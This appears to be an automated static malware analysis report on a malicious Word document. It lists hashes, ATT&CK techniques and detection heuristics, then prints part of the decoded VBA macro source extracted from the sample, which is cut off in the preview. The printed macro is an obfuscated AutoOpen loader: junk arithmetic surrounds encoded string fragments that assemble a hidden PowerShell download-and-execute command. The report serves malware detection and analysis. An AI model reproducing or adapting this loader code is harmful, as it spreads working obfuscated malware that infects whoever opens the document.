Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf8f0e079cc772ec…

MALICIOUS

Office (OLE)

Size: 209.0 KB
Created: 2018-07-05 06:56:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 89b69d2f1b82ea49992cc69e209b485f
SHA-1: 56a2c646085b9f865e8a3f42e1c9371eaa85f3b7
SHA-256: cf8f0e079cc772ec4088d7447d4e61444c47fb26c6bada5411bc75adf3890e28
Risk score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, which runs automatically when the document is opened, calls Shell() and CreateObject(), a pattern indicative of payload execution. The obfuscated auto-exec loader together with the ClamAV detection strongly suggests the document is designed to download and execute a secondary payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Valyria-6874681-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874681-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9311 bytes
SHA-256: 7f9453dcd57b45f322b75cd8b8e92b528e3ad1da251f2f5282ed27f775abd35c

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "iAitPfY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   CXOWkO = qKNRP - KqITNJ / 83955 - rbkUm / aAspM - RqltuM / NIQFUC / jcUEYV - 53211 * LwdBw - 87431 - pRYEfh
   PZASi = bWPSn - wjoQrI / 98745 - pPsNzO / whPXQ - WEiXC / PjZNjK / AIdHN - 44120 * pQAhnV - 31438 - cpzvXc
   CHulq = TtIvsw - VSkKTb / 37907 - boITt / AQkJO - JSuWni / tdQbr / usJHQ - 93642 * nwbSl - 35527 - rTcYli
   JsoLjv = BJDsN - VZCAi / 42525 - Ezkhj / HkNonc - jTPYL / uAwXjd / XHQzu - 77628 * UXMHH - 58445 - ofnVQ
   OPtNwm = qqqUAN - BRJnaB / 36439 - XLEEzP / cWPYM - dvzYpW / tfaBA / mDcHwj - 46115 * shIunf - 63027 - UEcAu
   drPjrZ = JzzUm - cIUsK / 97663 - sRNRr / BFtGIa - iCiNLC / szJiWN / tTsBw - 43546 * zMiwoP - 45423 - PqouM
   ZFvHKY = HJiMUw - ClXWEw / 78553 - wPQKm / fzjDw - BYtIq / XhGBR / XWjWcr - 87091 * zIHjq - 99311 - WcMuIV
   LPlfP = rlDDYc - APSso / 8256 - NoiBqW / KVYAjO - QrLBIu / wFqPD / NElkMp - 75200 * Wkjos - 14614 - PiDrNa
   BJiokb = FZBEd - zUQtw / 41709 - IGHQh / GUKCTN - tGGSG / iORmG / AtoLX - 53967 * ujWuC - 27051 - oVluX
   HqfJk = jnlnw - Gkonq / 53287 - uHbNQ / ThbnXp - djitjj / snzzA / paipPA - 72647 * oQfdP - 42382 - jHAOz
NGFGBwZGtDoG (zaCss + vQEKaXLN + OVARQYsRGJ)
   TEoYmB = LcnaV - PkRflK / 84327 - VdXwQ / ihpbS - AKmujv / jAthro / VjLpC - 74567 * bwbRc - 43436 - dimLHY
   wXwph = JcwfH - tzVAZ / 61525 - ZMKdE / qCVHV - QYQloq / FOSWi / VMtiIl - 73296 * CIrnuu - 31344 - JnUavr
   HhHYIt = iviFH - BFKDdf / 82501 - PWmDq / TubAkU - kUqwoG / zCKKP / Nlirj - 10981 * isLVUR - 19411 - kTdUnz
   NjJMaI = qfrjM - YNVjIN / 31049 - zuwwO / fBEpd - RQbbZB / BBHCKD / kZzrnd - 41710 * QlMQM - 7294 - pbBFmf
End Sub


Attribute VB_Name = "tKGUPXqrlsTU"
Function zaCss()
On Error Resume Next
ovFMEp = 63253 + 18513 * (qZWzT + jFcjsr / 18490 / VuLYF * cUOuS + KorkQA / 87959 + UlmGQf)
XWsJq = "wershe" + "ll     " + "         " + "    [ST" + "RING]::jO" + "In" + Chr(40) + " '' "
uMKRpX = 83097 + 18669 * (zJnJC + YLEwD / 50685 / qoAUSq * FJzfZ + DutQIm / 95340 + EPEoW)
   mWNWIw = (WRVEA * PqMHk / 46093 - iRnoQ + jlYvfw * WSmjJ / hhYcv + lzCOD * 93111 / wRIVj)
   IOoiY = 68936 + 34049 * (RbmdVK + jhkuNs / 36350 / zUDkHF * ZPEKG + dHmEZr / 97262 + HLwaK)
TmsLHjN = "," + Chr(40) + " '8>79" + "z65{6" + "9}17!" + "66>73" + "z91}1!67" + "{78&70o7" + "3&79" + "z88f12!9" + "8!73{88v" + "2o123&" + "73}78t1"
PAARv = (Ynihkp * LZMsBr / 79054 - LQKWd + fkzlsk * EDJKCA / sXwHzl + MAlTWV * 96398 / kqvRw)
   hwsED = (VDizq * PnSCW / 83379 - SkLRWO + BTSPkC * pqCPui / qwDUfQ + PSnYaB * 50166 / WiVqR)
   QkzVpI = (dzDcwU * lFprkf / 60626 - XUzbzo + wCKDl * zaHGv / TEKbzj + jCjso * 50624 / mMdVN)
fiDDotfd = "11>64f6" + "9v73>6" + "6}88t2" + "3!8}86&1" + "11t127" + "v17&1" + "1z68z88}8"
SOoOZz = (ncJPc * IzqwDl / 2289 - qKBQXU + tERbo * kGrCJ / CAvRm + fNhfrN * 38576 / FcDnz)
SVQjMTJzJ = "8}92&2" + "2f3f3v91" + "v91f91" + "v2!77" + "{72{90" + "f67!71f77" + "{88&1!9" + "5v66f" + "75&2" + "t79!" + "67z65"
UPovr = (inXXTP * oRAjQ / 68702 - kfbrf + wSKbMk * IjZCj / hWOEK + JVVFzw * 90018 / YQoow)
   tYsnob = (qzvtT * iutOSs / 12804 - OMDHmG + CEEHo * HXZzJ / pqfvT + CbhKY * 58539 / WAfLo)
vHXGupr = "{3o7" + "8>64f6" + "7t75&3f1" + "16t70!72v" + "73!107>" + "89!3f108t"
MdvKjv = (EswzM * kVbRA / 43001 - cMKfR + urvkGT * tKlJzH / UQNBw + CovNXv * 87687 / KzSPt)
lbJDTi = "68v88o88&" + "92}22f3o3" + "v91>91!91" + "{2o72}67{" + "71o77o9" + "5t95{73" + "}95&9" + "5f67{9" + "4v69o7" + "7}2{" + "79v6"
vZPQY = (pvYEt * RXitln / 15222 - pBkKJ + vcSzj * cMPVw / WtMoCu + JPmsA * 52100 / mYPuoE)
   JHrfY = (ajSRt * kMzJi / 66687 - GwiNKa + jKTtFD * LHFJR / uNLvF + kawzJ * 63017 / btMbt)
wVoARb = "7z65t2}78" + ">94{3v79" + "z111" + "f73>101t3" + "1{3f1" + "08t6" + "8{88" + "o88{9" + "2t22" + "o3z3&91" + "!91t91}2{" + "69z66&"
zaCss = XWsJq + TmsLHjN + fiDDotfd + SVQjM
... (truncated)